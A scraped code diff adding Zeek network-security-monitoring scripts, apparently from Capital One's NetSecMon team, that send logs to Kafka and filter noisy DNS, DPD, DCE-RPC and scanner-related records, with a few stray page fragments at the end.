+        if (stream_id in Kafka::logs_to_ignore) {
+            next;
+        }
+
+        if ( (|Kafka::logs_to_send| == 0) || stream_id in Kafka::logs_to_send ) {
+            local pathname = to_lower(sub(fmt("bro_%s", stream_id),/:.*$/, ""));
+            local filter: Log::Filter = [
+                $name = fmt("kafka-%s", stream_id),
+                $writer = Log::WRITER_KAFKAWRITER,
+                $config = table(["stream_id"] = fmt("%s", pathname)),
+                $path = pathname
+            ];
+
+            if (stream_id == Conn::LOG) {
+                filter$pred = Conn_Filter::filter_conn_log_pred;
+            }
+
+            if (stream_id == DNS::LOG) {
+                filter$pred = DNS_Filter::filter_dns_log_pred;
+            }
+
+            if (stream_id == Files::LOG) {
+                filter$pred = FILES_FILTER::filter_files_log_pred;
+            }
+
+            if (stream_id == SSL::LOG) {
+                filter$pred = SSL_FILTER::filter_ssl_log_pred;
+            }
+
+            if (stream_id == DCE_RPC::LOG) {
+                filter$pred = DCE_RPC_FILTER::filter_dce_rpc_log_pred;
+            }
+
+            Log::add_filter(stream_id, filter);
+        }
+    }
+}
--- a/capitalone/main.zeek
+++ b/capitalone/main.zeek
@ -0,0 +1,34 @@
+#
+# NetSecMon Team @ Capital One
+#
+# Who               When            What
+# -----------------------------------------------------------------------------
+# Aaron Eppert      03/19/2019      Refreshed completely
+#
+
+# Load file extraction
+# @load ./frameworks/files/extraction
+
+# Modify logs to include system information and de-dot
+@load ./frameworks/logging/extension
+
+# Load detect scripts
+@load ./detect
+
+# Load enrichments
+@load ./enrichments
+
+# Load Capital One specific extensions
+@load ./extensions
+
+# Load optimizations
+@load ./optimizations
+
+# Load Third-Party Scripts
+@load ./external
+
+# Load intel data
+@load ./frameworks/intel
+
+# Load local sensor-specific configuration - MUST BE LAST
+@load ./local
--- a/capitalone/optimizations/load.zeek
+++ b/capitalone/optimizations/load.zeek
@ -0,0 +1,23 @@
+#
+# NetSecMon Team @ Capital One
+#
+# 
+# Who               When            What
+# -----------------------------------------------------------------------------
+# Aaron Eppert      11/7/2018       Added remove_services_from_connlog.zeek, shunt_ssl.zeek
+# Aaron Eppert      11/14/2018      Added notice_suppressions.zeek
+# Aaron Eppert      02/11/2019      Added reduce_x509.zeek, files_filter.zeek, ssl_filter.zeek
+# Aaron Eppert      02/13/2019      Added dns_log_filter.zeek, dpd_log_filter.zeek
+# Aaron Eppert      03/11/2019      Added dce_rpc_log_filter.zeek
+# Aaron Eppert      03/18/2019      Renamed remove_services_from_connlog.zeek to conn_log_filter.zeek
+# Aaron Eppert      04/11/2019      Enable capture_loss collection globally
+#
+@load ./shunt_ssl
+@load ./notice_suppression
+@load ./reduce_x509
+@load ./files_filter
+@load ./ssl_filter
+@load ./dns_log_filter
+@load ./dpd_log_filter
+@load ./dce_rpc_log_filter
+@load ./capture_loss
--- a/capitalone/optimizations/capture_loss.zeek
+++ b/capitalone/optimizations/capture_loss.zeek
@ -0,0 +1,12 @@
+@load policy/misc/capture-loss.zeek
+
+redef CaptureLoss::watch_interval = 1 min;
+
+event zeek_init() &priority=-10
+{   
+    for(stream_id in Log::active_streams) {
+        if(stream_id == CaptureLoss::LOG) {
+            Log::add_default_filter(stream_id);
+        }
+    }
+}
--- a/capitalone/optimizations/dce_rpc_log_filter.zeek
+++ b/capitalone/optimizations/dce_rpc_log_filter.zeek
@ -0,0 +1,37 @@
+# Who               When            What
+# -----------------------------------------------------------------------------
+# Aaron Eppert      03/11/2019      Initial commit 
+#
+
+#
+# NOTE: This relies on capitalone/ip_to_application to be loaded 
+#
+
+module DCE_RPC_FILTER;
+
+export {
+    const enable = T &redef;
+    global filter_dce_rpc_log_policy:  Log::PolicyHook;
+}
+
+hook DCE_RPC_FILTER::filter_dce_rpc_log_policy(rec: DCE_RPC::Info, id: Log::ID, filter: Log::Filter)
+{
+    if(rec$id$resp_h in IP_TO_APP::ipToAppTbl) {
+        if(IP_TO_APP::ipToAppTbl[rec$id$resp_h] == "qualys") {
+            break;
+        }
+    }
+
+    if(rec$id$orig_h in IP_TO_APP::ipToAppTbl) {
+        if(IP_TO_APP::ipToAppTbl[rec$id$orig_h] == "qualys") {
+            break;
+        }
+    }
+}
+
+event zeek_init() &priority=-11
+{
+    local tf = Log::get_filter(DCE_RPC::LOG, "default");
+    tf$policy=filter_dce_rpc_log_policy;
+    Log::add_filter(DCE_RPC::LOG, tf);
+}
--- a/capitalone/optimizations/dns_log_filter.zeek
+++ b/capitalone/optimizations/dns_log_filter.zeek
@ -0,0 +1,48 @@
+@load base/protocols/dns
+
+module DNS_Filter;
+
+export {
+	const filter_in_addr_arpa_query = F &redef;
+	const filter_bonjour_query      = F &redef;
+	const filter_netbios_query      = F &redef;
+	const filter_wpad_query         = T &redef;
+
+    global logs_to_filter: set[string] = set("default") &redef;
+
+	global filter_dns_log_policy:  Log::PolicyHook;
+}
+
+hook DNS_Filter::filter_dns_log_policy(rec: DNS::Info, id: Log::ID, filter: Log::Filter)
+{
+	if ( DNS_Filter::filter_bonjour_query && 
+	 	 rec?$query && 
+	 	 ( (/^(b|db|r|dr|lb)\._dns-sd\._udp/ in to_lower(rec$query)) ||
+	 	   (/^_[[:print:]]+\._tcp\.local/ in to_lower(rec$query)) ) ) {
+		break;
+	}
+    
+	if ( DNS_Filter::filter_in_addr_arpa_query && 
+		rec?$query && 
+		(/.in-addr.arpa/ in to_lower(rec$query) ||
+		 /.ip6.arpa/ in to_lower(rec$query) ) ) {
+		break;
+	}
+	
+	if ( DNS_Filter::filter_netbios_query &&
+		rec?$qtype_name && /nb/ in to_lower(rec$qtype_name)) {
+		break;
+	}
+	
+	if ( DNS_Filter::filter_wpad_query &&
+		rec?$query && /wpad/ in to_lower(rec$query)) {
+		break;
+	}	
+}
+
+event zeek_init() &priority=-11
+{
+	local tf = Log::get_filter(DNS::LOG, "default");
+	tf$policy=filter_dns_log_policy;
+	Log::add_filter(DNS::LOG, tf);
+}
--- a/capitalone/optimizations/dpd_log_filter.zeek
+++ b/capitalone/optimizations/dpd_log_filter.zeek
@ -0,0 +1,23 @@
+@load base/frameworks/dpd
+#@load base/frameworks/analyzer/dpd
+module DPD;
+
+export {
+    const dpd_ignore: set[Analyzer::Tag, string] = set() &redef;
+}
+
+redef dpd_ignore += { [Analyzer::ANALYZER_HTTP, "not a http reply line"],
+                      [Analyzer::ANALYZER_HTTP, "failure_reason:not a http request line"],
+                      [Analyzer::ANALYZER_SSL, "Binpac exception: binpac exception: out_of_bound: SupportedVersions: 4 > 2"] 
+                    };
+
+event protocol_violation(c: connection, atype: Analyzer::Tag, aid: count, reason: string) &priority=2
+{
+    if( [atype, reason] in dpd_ignore) {
+        if ( c?$dpd ) {
+            delete c$dpd;
+        }
+
+        return;
+    }
+}
--- a/Show More
+++ b/Show More
				`@ -0,0 +1 @@`
				`Database and Contents Copyright (c) 2025 MaxMind, Inc.`
				`@ -0,0 +1 @@`
				`Latitude and longitude are not precise and should not be used to identify a particular street address or household.`
				`@ -0,0 +1 @@`
				`docker build --no-cache -t pkelleyls/zeek-ics:6.0.4 . && docker build --tag pkelleyls/zeek-ics:6.0.4 --push .`